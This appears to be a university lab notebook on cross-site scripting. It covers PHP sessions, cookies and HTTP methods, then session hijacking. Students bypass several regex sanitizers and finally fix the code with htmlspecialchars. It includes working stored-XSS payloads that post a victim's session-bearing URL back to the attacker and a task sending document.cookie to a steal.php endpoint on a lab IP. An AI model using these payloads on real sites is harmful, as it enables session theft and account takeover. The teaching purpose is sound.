# <strong>Cross-Site Scripting</strong>

Cross-Site Scripting (XSS) is an injection attack where hackers deliver a JavaScript payload to execute malicious code whenever someone visits a website. These types of attacks are common on websites that have message boards or comments. There are three types of XSS attacks.

<figure><center><img src="resources/xss/xss_example.jpg" style="width: 75%; height: 75%;"></img></center><em><figcaption>Credit: <a href="https://spanning.com/blog/cross-site-scripting-web-based-application-security-part-3/">Spanning</a></figcaption></em></figure>

<strong>Reflected XSS</strong> is where JavaScript is injected through an HTTP request. A website that uses CGI (Common Gateway Interface) retrieves parameters through the address bar of a browser. A reflected XSS attack injects HTML or JavaScript into an HTTP request, then tampers with the page that gets rendered to you.

Here is an example from <a href="https://portswigger.net/web-security/cross-site-scripting">PortSwigger</a>: 

```https://insecure-website.com/status?message=<script>/*+Bad+stuff+here...+*/</script>```

When the site is accessed, it will render: ```<p>Status: <script>/* Bad stuff here... */</script></p>```

The ```<script>``` tag will execute any JavaScript code that the hacker wishes to write.

<strong>Stored XSS</strong> is an attack where injected JavaScript is stored on a website by an attacker. For this lab, you will be working with stored XSS payloads. When message boards don't sanitize a user's input, a hacker can write an attack containing ```<script>```, which gets executed whenever that webpage is visited by anyone.

<strong>DOM-Based XSS</strong> is an attack similar to reflected XSS attacks, but does not utilize HTTP requests when delivering the payload. Rather than using CGI parameters, a DOM-Based attack does not send data to the server, and the attack is entirely client-side. These attacks are difficult to differentiate from reflected XSS attacks. 

<strong>This lab will contain three topics, and you will learn the following:</strong>

1. PHP Sessions, HTTP Protocols, and ```document.cookie```
2. Session Hijacking
3. A Large-Scale Application of Cross-Site Scripting

In [1]:
# Setting up the lab.
import ipywidgets as widgets
from IPython.display import display, HTML, Javascript
from IPython.core.magic import register_line_magic
import os
# For accessing the nodes:
import subprocess
# For the stopexp command:
import re

# These are pre-set so that the first three steps will work properly, as they all
# depend on each other. Remaining booleans will be set in the cells.
step1Complete = step2Complete = step3Complete = False

# When true, it will not auto-save at each step.
runAllSteps = False

###### Used for saving notebooks. ######
import threading
# Threading required in case steps are progressed too quickly.
save_lock = threading.Lock()

# The save function itself.
def save_notebook():
    with save_lock:
        result = subprocess.run('su - umdsectc -c "/home/umdsectc/notebooks/resources/save.py intro"', shell=True, capture_output=True, text=True)

# Creating a thread to save the notebook.
def trigger_save():
    save_thread = threading.Thread(target=save_notebook)
    save_thread.start()

###### Used for loading notebooks. ######
import queue

load_lock = threading.Lock()
result_queue = queue.Queue()

def load_notebook():
    with load_lock:
        result = subprocess.run('su - umdsectc -c "/home/umdsectc/notebooks/resources/load.py intro"', shell=True, capture_output=True, text=True)
        result_queue.put(result)  # Put the result in the queue.

# Creating a thread to load the notebook.
def trigger_load():
    load_thread = threading.Thread(target=load_notebook)
    load_thread.start()
    load_thread.join()  # Wait for the thread to complete before adding result to the queue.
    return result_queue.get()  # Get the result from the queue.

### Step 0: Begin the experiment.

Click the button to begin creating the experiment.

In [2]:
# Click the button below to start the experiment.
def startlab(button):
    # Defining the lab name.
    labname = "intro"

    # Writing the information to an empty field below the button.
    with output0:
        output0.clear_output()
        
        # First, checking if the materialization exists. May have been stopped by a previous lab.
        materialPattern = "real." + labname + ".umdsec[a-z]{1,2}"

        # Listing the materializations to find if there's an existing one for this lab.
        checkMaterial = os.popen('su - umdsectc -c "mrg list materializations"').read()
        regex = re.compile(materialPattern)
        # Getting the matches:
        match = regex.search(checkMaterial)

        if match:
            display(HTML("<span style='color: orange;'>An existing materialization for this lab already exists. </span><span>You might have ran another \
            lab without stopping this one. Attaching the existing materialization.</span>"))
            subprocess.run(f'su - umdsectc -c "mrg xdc attach xdc '+ match.group(0) + '"', capture_output=True, text=True, shell=True)
            display(HTML("<newline><span style='color: green;'><strong>Setup complete. You may begin the lab! </strong></span>" \
                         "<span>When you're finished, close your lab at the bottom of the notebook.</span>"))
        
        else:
            display(HTML("<span>No existing materializations are found.</span>"))
        
            # Second, start the lab.
            display(HTML("<span>Starting " + labname + " lab. This will take a few minutes to process. Please wait.</span> \
            <span><img width='12px' height='12px' style='margin-left: 3px;' src='resources/loading.gif'></span>"))
            startexp = subprocess.run('su - umdsectc -c "bash /share/startexp ' + labname + '"', capture_output=True, text=True, shell=True)
            output0.clear_output()
            display(HTML("<span>Done. Result:</span>"))
            print(startexp.stdout)

            # Another lab is already attached to the XDC.
            if (("XDC already attached") in startexp.stdout):
                existingLab = re.search(r"real.(.*).umdsec[a-z]{1,2}", startexp.stdout).group(1)

                # Shouldn't happen.
                if (labname == existingLab):
                    display(HTML("<span style='color: red;'>Your lab was already started. </span><span>Please continue to the next step.</span>"))

                # Detaching the existing lab, then attaching the current one.
                else:
                    display(HTML("<span style='color: orange;'>Warning: You did not stop your previous experiment. </span><span>Please stop your experiments \
                    before starting a new one. Detaching the " + existingLab + " experiment.</span>"))
                    os.popen('su - umdsectc -c "mrg xdc detach xdc.umdsectc"')
                    display(HTML("<span>Attaching the current lab.</span>"))
                    os.popen('su - umdsectc -c "mrg xdc attach xdc ' + materialPattern + '"')
    
            # Third, get the lab materials onto the node.
            display(HTML("<span>Allocating lab resources onto the node. <u>Please wait a little longer...</u></span>"))
            runlab = subprocess.run('su - umdsectc -c "bash /home/runlab ' + labname + '"', capture_output=True, text=True, shell=True)
            display(HTML("<newline><span style='color: green;'><strong>Setup complete. You may begin the lab! </strong></span>" \
                         "<span>When you're finished, close your lab at the bottom of the notebook. Your lab will be active for one week.</span>"))

# Creating the button.
startButton = widgets.Button(description="Start Lab")

# Creating an output area.
output0 = widgets.Output()

# Run the command on click.
startButton.on_click(startlab)

# Display the output.
display(startButton, output0)

Button(description='Start Lab', style=ButtonStyle())

Output()

If you previously stopped your lab, you may restore your progress below by clicking "Load Lab". <u>You do not have to load your lab if you signed out, closed your notebook, or exited your node(s) or XDC by using ```exit```.</u>

In [3]:
# Click the button below to load your lab.
def loadlab(b):
    with output0_2:
        output0_2.clear_output()
        display(HTML("<span>Searching for an existing lab in your notebook...</span>"))

    if (os.path.exists("/home/umdsectc/notebooks/saves/umdsectc_intro.tar.gz")):
        with output0_2:
            output0_2.clear_output()
            display(HTML("<span>Loading your lab...</span> \
                <span><img width='12px' height='12px' style='margin-left: 3px;' src='resources/loading.gif'></span>"))
            result = trigger_load()
            if (result.returncode == 0):
                    output0_2.clear_output()
                    display(HTML("<span style='color: green;'>Your lab has been successfully loaded.</span>"))
            elif (result.returncode == 2):
                    output0_2.clear_output()
                    display(HTML("<span style='color: red;'>The intro lab is inaccessible. Please start your lab. If you have already started it, wait a minute and try again.</span>"))
            else:
                    output0_2.clear_output()
                    display(HTML("<span style='color: red;'>An error occurred while loading your lab.</span>"))

# Creating the button.
loadButton = widgets.Button(description="Load Lab")

# Creating an output area.
output0_2 = widgets.Output()

# Run the command on click.
loadButton.on_click(loadlab)

# Display the output.
display(loadButton, output0_2)

Button(description='Load Lab', style=ButtonStyle())

Output()

## <strong>Topic 1: PHP Sessions, HTTP Protocols, and ```document.cookie```</strong>

#### <strong>PHP Sessions</strong>

PHP is a server-side language that's used in web development. PHP is responsible for back-end development, which consists of handling SQL queries for databases, transactions for businesses, image editing, saving data to a storage container, and much more. For this lab, we are focusing on some important concepts used for handling user information, which are sessions and cookies. 

<strong>Sessions</strong> are stored on a server, which expire when the browser is closed. Sessions are usually safer, and store content for less time. However, they do not make you invulnerable, which you will discover later in the lab.

<strong>Cookies</strong> are stored on the client's browser, which have a set expiration time. Cookies are stored as text files, which the browser retrieves when a website requests them. You may look up where your cookies are stored by your browser, as well as their contents. A hacker can retrieve cookies no different from how you retrieve them. 

<em>Side note:</em> The European Union requires websites to be GDPR compliant if they use cookies, which is one of the most strict privacy and security laws in the world. If you are interested in reading more about cookies and the GDPR regulation, you may read more <a href="https://gdpr.eu/cookies/">here</a>. 

It should be clear that cookies are not meant to store private data. The safer alternative to cookies are sessions. Cookies can still be used for storing data that's meant to be public.

Sessions and cookies are global variables that are used in PHP, meaning they're usable across all PHP files. They are called with either ```$_SESSION["key"] = value;``` or ```$_COOKIE["key"] = value;```. Before sessions can be used in PHP, a session must be started. Whenever a ```$_SESSION``` variable is used in PHP, you must call ```session_start()``` before the ```$_SESSION``` variable can be used. Sessions can be manually ended by using ```session_destroy()```.

#### <strong>HTTP Protocols</strong>

An HTTP (Hypertext Transfer Protocol) request is a method of sending information across website pages. We are going to look at ```POST``` and ```GET``` requests for this lab.

A <strong>```POST```</strong> request consists of sending data to a website, to which it becomes processed by the server. ```POST``` should not be confused with ```PUT```, where ```PUT``` is mainly used for replacing or updating a certain resource on a server. ```PUT``` requires a specific Uniform Resource Identifier (URI), meaning you must specify the exact path and resource that you want to update.

The most common use of a ```POST``` request is submitting a form on a website. The website identifies specific names for each field, like name, email, or an "accept" checkbox. Then, when the user ```POST```s the information by clicking submit, the server assigns those names with specific values that the user provided on the form, then processes the information, like adding the values to the database.

A <strong>```GET```</strong> request gathers a resource from a server. ```GET``` variables are easy to determine from a PHP website, as they appear in the URL of a website. A ```GET``` variable can be obtained by observing a ```?``` after a ```.php``` extension in the URL, then each subsequent name with a ```=``` is the name and value of each ```GET``` variable.

Here is an example: ```https://www.testwebsite.com/index.php?name=umdsecXX&age=21```, where ```name``` is umdsecXX and ```age``` is 21.

If you have ```telnet``` installed, you can call a ```GET``` request for the landing page of any website. Simply type ```telnet url 443``` to call an HTTPS request for any provided URL, then type ```GET /``` to get the HTML source code for the landing page of the website.

#### <center><strong>Differences Between Both Protocols</strong></center>

| Feature        | GET Method                                                                 | POST Method                                                                            |
|----------------|----------------------------------------------------------------------------|----------------------------------------------------------------------------------------|
| Operation      | Used to retrieve information from the server.                              | Used to send data to the server to create/update a resource.                           |
| Data Location  | Appends data to the URL, visible to all.                                   | Includes data in the request body, not displayed in the URL.                           |
| Idempotency    | Idempotent; the same request can be repeated with no further changes.      | Non-idempotent; repeating the same request can lead to different results.              |
| Data Size      | Limited by the URL length; less data can be sent.                          | No limitations on data size; suitable for large amounts of data.                       |
| Caching        | Can be cached.                                                             | Not cached by default.                                                                 |
| Security       | Less secure as data is exposed in the URL.                                 | More secure; data is concealed within the request body.                                |
| Use Case       | Ideal for searching and retrieving data.                                   | Ideal for transactions and updating data.                                              |


<center><em>Source: <a href="https://www.akto.io/academy/get-vs-post">Atko.io</a></center>

<br>

In PHP, making a ```POST``` request will refresh the page, creating ```$_POST["name"] = key``` variables. These variables go away when the page is refreshed, so you may call them within an "if" statement where ```$_SERVER['REQUEST_METHOD'] == 'POST'```. When PHP detects a ```POST``` request, the PHP file will enter this code segment, where you may process the ```POST``` variables. 

Similarly with ```GET```, you may call ```$var = $_GET["key"]```, allowing PHP to retrieve variables from the address bar.

#### <strong>```document.cookie```</strong>

The ```document.cookie``` variable is a <strong>JavaScript</strong> variable. JavaScript is a language that's used in browsers, which means that you can debug websites that use JavaScript straight from your browser. Each browser is different, but the general way that you can navigate to a console is by doing:

- Right-click on a webpage (does not work in all webpages, like JupyterLab).
- Navigate to "Inspect Element" or "Inspect".
- Select "Console".

Since ```document.cookie``` is a variable, you may simply type ```document.cookie``` within the console to view the value of it.

Whenever PHP sets a session variable, the user is assigned a value called ```PHPSESSID```. Although session variables are stored on the server, the session's ID must be stored on the browser. The webpage will identify your session ID, find the variables that are associated with that session ID, then make them available for that specific user. These session variables cannot be viewed by anyone else, unless they have your session ID.

### Step 1: Identifying Your Session ID

<strong>This lab is going to require port forwarding, which requires setup on your own, local machine. If you have not already done port forwarding, you will need to follow the steps from this notebook.</strong>

<strong>Additionally, this lab will contain two nodes.</strong> Attempting to access a node called ```xss``` will not work! The two nodes for this lab are ```server``` and ```client```. You will be doing all of your work on the ```server``` node.

After you have port forwarded to your ```server``` node, access ```localhost:port/cgi-bin/xss_practice.php```, where ```port``` is the number that you used in your SSH statement.

<strong>For example</strong>, if you have already set up port forwarding, type the following command into your terminal: ```ssh -L 8080:server:80 umdsecXX-xdc-umdsecXX```, then access the practice page by typing ```localhost:8080/cgi-bin/xss_practice.php``` into your web browser.

Once you have navigated to this website, you are going to land on a notes page. The notes page is where users may freely post whatever note that they want, as well as stating who has posted the note.

You already have an account for this website. These are your credentials:

| Username: | Password:    |
|-----------|--------------|
|  umdsec   |   hacker123  |

Using these credentials, sign into the website.

For the first step, figure out what your ```PHPSESSID``` value is. Copy the entire value of this cookie (excluding the ```PHPSESSID=```), then paste it into the sign-in field.

Once you have signed-in, click the button to check your work below.

## <strong>Topic 2: Session Hijacking</strong>

You are going to be given three PHP session cookies in plain text. For this topic, you are going to learn how to do a basic XSS attack that will hijack a user's session, giving you permission to sign in to their accounts and view private information.

XSS attacks require some inner knowledge with how websites and its server operate. Since you are working in a learning environment, you will be told how ```xss_practice.php``` is setup.

```xss_practice.php``` uses a SQL database to store its usernames and the notes written by each user. When a note is saved, the memo is written to the database, and can only be viewed by that user. Currently, you have written one note to the website, and you may delete notes, if you wish. <u>It's not necessary to understand how to use SQL for this lab.</u> It's only important to understand how the notes are being stored.

With poor website design, signing into your account will display your ```PHPSESSID``` within the URL of the website. The creator of this website thinks that you do not know what this string is. However, ```PHPSESSID``` is being used for authentication, and displaying it within the URL of the website. Later, you will read why this an unsafe approach to authenticate on the website.

Your goal for this topic is figuring out how to write other users' ```PHPSESSID``` variable as a note to your own account. Then, signing into their account and viewing private information that they've stored.

### Step 2: Using Website to Execute JavaScript

Open ```xss_practice.php``` in your ```server``` node and observe how the form works for uploading a note to the website. The form has a field called ```user_memo```, which contains the note that the user wrote. Additionally, the form has an input field with the type ```hidden```. These ```hidden``` types are form fields that are not viewable. They contain information that are pre-determined by the website, which in this case, is the username. The username is being stored as a hidden field, as it's required for the SQL database so that the website knows who wrote each note. <u>Although the input is type ```hidden```, you can still see this field in the source code of the HTML. You may find it yourself by using Inspect Element.</u>

When a form is submitted, a ```POST``` request is sent to ```submit_note.php```, where the server takes the ```POST``` information from the form, then writes it to the database by safely using prepared statements. 

<em>If you have already done the "SQL Injection" lab, then you will notice that the form is not vulnerable to SQL injection. This means you cannot view other users' information by using SQL injection.</em>

First, you will start with a basic XSS attack. This attack will not affect anybody yet, but it will be the most basic form of JavaScript injection that you could perform.

<strong>Your task:</strong> Write a ```<script>``` block as a note on the website. Within the script block, use ```console.log()``` to write the value of ```2 * 31```.

<u>Tips:</u>
- Use Inspect Element on your browser to view the "Console". The console is where you will be able to view the result of your payload.
- Since your payload is containing a ```<script>``` tag, it will not render. If you are not seeing a message displaying on the website, then your payload is working.

### Step 3: Discovering an Exploit

Recently, you discovered another user who exists on the website who managed to take the username: ```Hacker```. You want to attempt to access their account without knowing the password for it. Currently, this is what you know about the website:

- Uploading a note to the website only requires the username and note content through a POST request.
- You cannot view notes that are made by other users.
- JavaScript is freely executing through your notes that you upload.

Using this information, an opportunity arises. You can post notes onto someone else's account, just as long as you know the username of the account. This means when a user accesses their account, any code that you write to their account will be executed.

JavaScript can call an HTTP request by using either ```fetch``` or ```XMLHttpRequest```. The ```fetch``` statement will be used as an example, since ```XMLHttpRequest``` requires multiple calls. Here is an example of a ```fetch``` statement to ```POST``` information to a specific form/website:

```
<script>
  fetch("submit_note.php", {
    method: "POST",
    headers: {
      "Content-Type": "application/x-www-form-urlencoded"
    },
    body: "key=value"
  });
</script>
```

A breakdown:
- ```method``` allows you to choose your HTTP request. In this case, a ```POST``` request.
- ```headers``` allow you to create additional instructions for your HTTP request.
- ```Content-Type``` indicates what type of information is being sent within the body of the request. In this case, ```application/x-www-form-urlencoded``` encoded key-value pairs through HTML requests. You can read more about these from <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Type">Mozilla's documentation</a>.
- ```body``` stores the information that you're sending with the request.

<strong>Your task:</strong> Create a ```<script>``` tag that executes the following information within your account:
- Create a ```POST``` request to the ```submit_note.php``` page which contains the following information:
  - The username ```Hacker```.
  - A note with any content you'd like to post to ```Hacker```. Such as: "I'm in your account." or "This website is unsafe!" Your work will not be checked for using these two ideas. Feel free to use whichever message you'd like.

This is what your attack should be doing:
- Your payload gets posted as a note to your website, which should not display because your ```<script>``` tag is being rendered by the HTML page.
- Each time that your website gets refreshed, your ```<script>``` tag is executing, which creates a note on ```Hacker```'s, account.
- ```Hacker``` will see a new note posted with your content posted on it.

A button called <strong>Peek</strong> is located at the top of the website. This button will sign into ```Hacker```'s account, then print their notes on the same page that you're on. Feel free to click on this button to check your work.

Remember to use the "Console" in your browser to view any JavaScript warnings/errors that you may be receiving from your message. You may always click on the "Reset" button at the top of the website to reset the entire website to its original state, or delete individual messages by clicking the "Delete" button.

### Step 4: Stealing Someone's Information

Now, you are successfully able to post content on someone else's account by using a XSS attack. At the moment, your attack is not stealing data from users. Like you have seen already, everyone who accesses the website has ```PHPSESSID``` stored as a ```document.cookie``` variable. 

From the previous step, you have a working payload that allows you to post whatever you want onto someone else's account. Now, whenever ```Hacker``` accesses their website, you want to deliver a ```POST``` request that sends their ```document.cookie``` value to your OWN account.

However, you noticed that when you're signed into your account, there is a value called ```token``` inside of the URL. This means that if you have the ```PHPSESSID``` value of someone else's account, you may sign into their account without knowing their password.

With some careful thought, this is the outline that you plan to use:
- Write a ```fetch``` request that writes a note onto ```Hacker```'s account (using ```write_note.php```).
- ```Hacker``` opens the page and executes infected JavaScript code that you wrote to their account.
- The infected JavaScript code retrieves the current URL of ```Hacker```'s website, which contains his cookie.
- Your payload takes the URL that ```Hacker``` is currently on, then sends it as a note to your account.

<strong>Your task:</strong> From the previous step, you already have a template for how to write a note onto ```Hacker```'s account. Copy your entire payload (including the ```<script>``` tags), and inside of the body of your ```fetch``` statement, set the ```username``` to ```umdsec```, and the ```note``` to the payload that you just copied.

The <strong>Peek</strong> button is now named <strong>Call User</strong>. This button will sign ```Hacker``` into their account, then notify you when they have accessed the account. Once this is done, your page will refresh and show if your exploit has worked. 

<u>Tips</u>:
- ```location.href``` returns the URL of the current page where the JavaScript is executing. Use this to get the URL of ```Hacker```'s account.
- Using a URL within a ```POST``` request can cause undefined behavior, as special characters within the URL, such as ```, / ? : @ & = + $ #``` can break the data being sent in the ```POST``` request. When handling the URL of ```Hacker```'s website, use ```encodeURIComponent()``` on the URL to safely escape it within the body of your ```POST``` statement.

Answer:
```
<script>
  fetch("submit_note.php", {
    method: "POST",
    headers: {
      "Content-Type": "application/x-www-form-urlencoded"
    },
    body: `username=Hacker&note=
            <script>
             var url = location.href;
             fetch('submit_note.php', {
               method: 'POST',
               headers: {
                 'Content-Type': 'application/x-www-form-urlencoded'
               },
               body: 'username=umdsec&note=' + encodeURIComponent(url)
             });
           </script>`
  });
</script>
```

Break down steps a little more:
- Create an additional step that breaks apart the "send note back" and "send URL back".
- Instead of PHPSESSID, create a random token instead that gets created during runlab. Store in SQL. Emphasize to students the poor design choice.
- Create node called ```Teshwan``` which is the hacker. This node will contain the ```steal.php``` file.
- Rearrange the mention of "token" until the token is ready to be discussed. Same with ```document.cookie``` with the Sloth's Unlimited website.
- Token should not be ```PHPSESSID```. Create a different ID instead and use that for authentication.

### Step 5: Accessing Someone's Information

In the previous step, you successfully stole the URL of ```Hacker```'s account. Now, you may access their account and read their notes.

Click on the URL that was written to your notes. ```PHPSESSID``` stored in the URL of the website will allow you to sign in as ```Hacker``` without a password.

Using the blank below, type in ```Hacker```'s credit card number that they stored on the website.

## <strong>Topic 3: A Large-Scale Application of Cross-Site Scripting</strong>

The developers of the notes website has now moved to another project called Sloth's Unlimited. After learning about the security vulnerability on their previous website, they decided to recreate the website with a sanitization function. In hopes of avoiding another security exploit, they asked you to try breaking the website with your knowledge in cross-site scripting.

<strong>You are strongly encouraged to read about the outline of the website before continuing to the first step in this topic.</strong>

There are two nodes in this lab: ```client``` and ```server```. On the ```server``` node, a script is running permanently in the background which accesses every page of the website every few seconds. The script will be actively running cURL requests to access the website from the ```client``` node. 

These are the following IP addresses that will be important to know for the lab:

| Nodes:        | ```client```   | ```server```   |
|---------------|----------------|----------------|
| IP Addresses: | ```10.0.1.1``` | ```10.0.1.2``` |

On the website, you will need to create an account to sign into the forum. Once an account is made, you may begin posting. You may choose whatever topic that you would like to post on, or create your own topic.

The ```client``` node (```10.0.1.1```) has a file on it called ```steal.php```. This file takes a PHP parameter called ```cookie```, which takes the ```PHPSESSID``` token, then attempts to create a new category called ```Eagles``` with it. Creating a new category requires admin privileges, and the ```client``` node has the admin privileges that you are trying to steal.

<u>Here is the ultimate goal of the following few steps:</u> You are going to write a payload script that ```client``` will eventually run. The ```client``` node has access to the ```server``` node, meaning that it will be able to access ```steal.php``` which is stored on ```10.0.1.2```. This means you will need to find a way to make ```client``` call ```http://10.0.1.2/steal.php?cookie=COOKIE_VALUE```.

<u>Here are some important considerations when writing your payload</u>:
- ```client``` will work automatically, assuming that the script hasn't been stopped. You will begin the script in the first step of this topic.
- You do not have to access the ```client``` node for this lab. You only need to access the ```server``` node.
  - If you haven't already, you will need to port forward from the ```server``` node.
- In order to make ```client``` access the ```steal.php``` value, you may either use a redirection in your payload, or attempt to use a HTTP request, like you have done in the previous topic.
- The ```COOKIE_VALUE``` is the entirety of ```document.cookie``` in JavaScript. You are not required to split the variable or use regular expressions.

### Step 6: Running The ```client``` Script

In order for your exploit to work, you will need to start a script that will recreate the ```client``` accessing the website. Due to the functionality of JupyterLab, this cannot be done within your notebook. You will need to perform the following steps:

1. Open a new tab in JupyterLab.
2. SSH into your ```umdsecXX``` account, then SSH into your ```server``` node.
3. Navigate to ```/lab```.
4. Type ```./run_script```.

<strong>You must keep this tab open while testing your exploit.</strong> JupyterLab does not have a built-in terminal, and can only display terminal output when a script is finished. Since this is an endless script, it will need to keep running. The script will end when you press ```Ctrl + C```. It will continue to run when you close out of JupyterLab.

On some occasions, the script may time out. When this happens, you will need to navigate back to ```/lab``` in your ```server``` node, then re-run ```./run_script```.

### Step 7: Testing Your Exploit

Navigate to ```localhost:port/index.php``` to access Sloth's Unlimited. Once again, <strong>port forwarding is required</strong> in order to access the website from your browser. ```port``` is a value that you chose in your SSH statement.

Currently, there is not a sanitization function applied to the website, making the entire forum prone to cross-site scripting. When a message gets created, this is what the message gets called through:

```
function sanitize($string) {
  return $string;
}
```

Type a payload into the website that causes ```client``` to access ```steal.php``` using the call example that was provided above. After you have a working payload, you should see the ```Eagles``` category appear on the home page of Sloth's Unlimited. 

Take your payload and write it to a text file as  ```/lab/payload1.txt```, then click the button below to check your work.

### Step 8: Breaking The First Sanitization Function

The developers of Sloth's Unlimited have decided to use a sanitization function for all posts that are made to their message board. This is the sanitization function that they have decided to use:

```
function sanitize($string) {
  return preg_replace("/<\/?script[^>]*>/", "", $string);
}
```

This function will take any occurrence of ```<script>```, then replace it with an empty string.

Adjust your payload so that it will break this sanitization function. Write it to a text file as ```/lab/payload2.txt```, then click the button below to check your work.

### Step 9: Breaking The Second Sanitization Function

The developers of Sloth's Unlimited created a better sanitization function, in hopes to fix their security. This is the new function that they have written:

```
function sanitize($string) {
  $new = $string;
  do {
    $string = $new;
    $new = preg_replace("/<\/?script[^>]*>/", "", $string);
  } while (strcmp($string, $new) != 0);
  return $new;
}
```

This function will take all occurrences of ```<script>``` and replace them with an empty string.

Adjust your payload so that it will break this sanitization function. Write it to a text file as ```/lab/payload3.txt```, then click the button below to check your work.

### Step 10: Breaking The Third Sanitization Function (OPTIONAL)

Finally, the developers have decided to use one more sanitization function in hopes to prevent all vulnerabilities involving the ```<script>``` tag. This is what they are going to use:

```
function sanitize($string) {
  $new = $string;
  do {
    $string = $new;
    $new = preg_replace("/<[^>]+?>/", "", $string);
  } while (strcmp($string, $new) != 0);
  return $new;
}
```

Since this is an optional step, you are encouraged to think about what this function does, and how it can be broken.

Adjust your payload so that it will break this sanitization function. Write it to a text file as ```/lab/payload4.txt```, then click the button below to check your work.

### Step 11: Using PHP's Built-In ```htmlspecialchars()``` Function

From the previous few steps, you should be able to observe that creating an effective sanitization function is difficult, and should be avoided. Fortunately, PHP contains a built-in function that is used for escaping dangerous characters, named ```htmlspecialchars()```. This function takes a string for an input, and replaces all unsafe characters with escape characters to prevent cross-site scripting attacks. 

You may read the ```htmlspecialchars()``` documentation <a href="https://www.php.net/manual/en/function.htmlspecialchars.php">here</a>.

Create a copy of ```sanitize.php``` called ```sanitize.php.patch```. Make your changes to ```sanitize.php.patch```. Click the button below to save your work.

### Step 12: Writing Memos

Inside of ```/lab```, create two files named ```attack-memo.txt``` and ```fix-memo.txt```.

<strong>```attack-memo.txt```</strong>: Suppose that you are King Teshwan, the hacker for this website. Write a memo to Lord Dingwall, the owner of this website, explaining the attack that you made, describing how you broke each of the sanitization functions.

<strong>```fix-memo.txt```</strong>: Suppose that you are Lord Dingwall, the owner of this website. Write a memo to King Teshwan, the hacker for the website, explaining how you fixed the attacks that were made against the website.

For each of these memos, write no less than one paragraph. Include a proper opening and closure.

Click the button below to save your work.